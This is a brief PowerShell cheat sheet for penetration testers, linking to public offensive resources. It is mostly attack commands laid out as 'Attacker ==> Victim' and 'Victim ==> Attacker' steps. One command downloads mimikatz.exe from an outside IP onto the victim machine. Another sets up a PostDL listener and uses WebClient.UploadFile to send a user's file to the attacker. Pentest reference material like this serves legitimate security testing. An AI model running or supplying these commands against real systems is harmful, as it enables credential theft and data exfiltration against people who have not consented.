########## PowerShell ########## | https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters | https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Powershell%20-%20Cheatsheet.md | https://github.com/AlessandroZ/LaZagne | https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md | ******* Version ******* .. code-block:: powershell # Get PS version Get-Host | Select-Object Version # Alternatively, type $PSVersionTable and hit the Enter key $PSVersionTable | ***** Files ***** Read **** .. code-block:: powershell powershell Get-Content "../bla.php" | Download ******** Attacker ==> Victim .. code-block:: powershell powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://4.3.2.1/Win32/mimikatz.exe', 'mimikatz.exe')" | Upload ****** Victim ==> Attacker .. code-block:: # Attacker side cd $(mktemp -d) && git clone https://gitlab.com/charles.gargasson/PostDL . sudo python3 postdl.py --ip 0.0.0.0 --port 80 .. code-block:: # Upload from Victim powershell -c "(New-Object System.Net.WebClient).UploadFile('http://4.3.2.1/','C:\Users\BOB\Pictures\xyz.jpg')"